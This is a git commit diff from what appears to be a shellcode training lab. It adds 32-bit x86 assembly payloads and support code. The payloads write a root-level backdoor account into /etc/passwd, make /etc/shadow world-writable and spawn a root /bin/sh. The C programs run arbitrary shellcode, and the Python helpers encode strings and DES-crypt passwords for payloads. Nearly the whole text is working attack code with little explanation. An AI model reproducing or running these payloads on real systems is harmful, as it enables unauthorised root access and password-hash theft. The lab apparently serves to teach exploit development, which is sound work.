New commit. Added also NetworkShells.

2017-02-01 13:15:17 +01:00
parent 5d7498d6bd
commit 8348a251e3
34 changed files with 802 additions and 0 deletions
--- a/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf
+++ b/x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf
--- a/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm
+++ b/x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm
@@ -0,0 +1,53 @@
+; shellcode lab @ hack4
+; dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+mov eax, 5
+push ebx
+push    0x64777373
+push    0x61702f63
+push    0x74652f2f
+mov ebx, esp
+mov ecx, 0x401
+int 0x80
+
+; take filedescriptor
+xor ebx, ebx
+mov ebx, eax
+
+; write(f_open, line, 24)
+xor eax, eax
+xor ecx, ecx
+mov eax, 4
+
+push    ecx
+push byte 0x0a
+push    0x68736162
+push    0x2f6e6962
+push    0x2f3a746f
+push    0x6f722f3a
+push    0x3a303a30
+push    0x3a494e73
+push    0x386b5a39
+push    0x65736d48
+push    0x42413a72
+push    0x336b6361
+push    0x68316f6e
+mov     ecx, esp
+mov edx, 45
+int 0x80
+
+;close maybe?? ah forget that :>
+
+; exit(23)
+mov eax, 1
+mov ebx, 23
+int 0x80
+
--- a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+#
+# ascii converter for shellcoding-lab at hack4
+# ~dash in 2014
+#
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+	print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+	usage()
+	exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
--- a/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
+++ b/x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+		print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+		usage()
+		exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
+print
+for i in range(len(val)):
+		if i % 8 == 0:
+				print "push	 0x",
+
+		print "\b%c" % val[i],
+		i=i+1
+		k = i % 8
+		if k == 0:
+				print
+
+				
--- a/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
+++ b/x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm
@@ -0,0 +1,21 @@
+global _start
+
+section .text
+_start:
+
+;setuid
+xor     eax, eax
+mov     ebx, eax
+mov     eax, 11
+int     0x80
+
+;execve
+xor     ecx, ecx
+push    ecx
+push    0x69732f2f
+push    0x6e69622f
+mov     ebx, esp
+mov     edx, 0x00000000
+xor     eax, eax
+mov     eax, 11
+int     0x80
--- a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm
@@ -0,0 +1,27 @@
+; shellcodelab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     ecx, 0x1ff      ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     eax, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     eax, 1
+int     0x80
+
--- a/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
+++ b/x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm
@@ -0,0 +1,26 @@
+; shellcode-lab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     cx, 0x1ff       ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     al, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     al, 1
+int     0x80
--- a/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
+++ b/x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+#
+# crypt des tool for shellcoding lab at hack4
+# ~dash
+
+import sys
+import crypt
+
+def usage():
+    print "%s <password>" % (sys.argv[0])
+
+if len(sys.argv)<2:
+    usage()
+    exit()
+
+password = sys.argv[1]
+pw = crypt.crypt(password,'AB')
+print "Password: %s" % pw
+
--- a/x86_32/0x1_SycallBasics/Example_Code/shell.c
+++ b/x86_32/0x1_SycallBasics/Example_Code/shell.c
@@ -0,0 +1,20 @@
+/* 	shell.c
+	simple shell for shellcoding-lab at hack4 0x1
+	probably ripped somewhere
+	~dash
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+
+
+int main(){
+
+	char *args[2];
+
+	setuid(0);
+	args[0] = "/bin/sh";
+	args[1] = NULL;
+	execve(args[0], args, NULL);
+}
--- a/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c
@@ -0,0 +1,26 @@
+#include <string.h>
+#include <sys/mman.h>
+
+char shellcode[] = "";
+
+int main(int argc, char **argv)
+{
+  // Allocate some read-write memory
+  void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+  // Copy the shellcode into the new memory
+  memcpy(mem, shellcode, sizeof(shellcode));
+
+  // Make the memory read-execute
+  mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
+
+  // Call the shellcode
+  int (*func)();
+  func = (int (*)())mem;
+  (int)(*func)();
+
+  // Now, if we managed to return here, it would be prudent to clean up the memory:
+  munmap(mem, sizeof(shellcode));
+
+  return 0;
+}
--- a/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
+++ b/x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c
@@ -0,0 +1,15 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+char shellcode[] = "";
+
+int main(void)
+{
+ int *ret;
+
+    printf("%d\n",strlen(shellcode));
+    ret = (int *)&ret+2;
+    *ret = (int)shellcode;
+return 0;
+}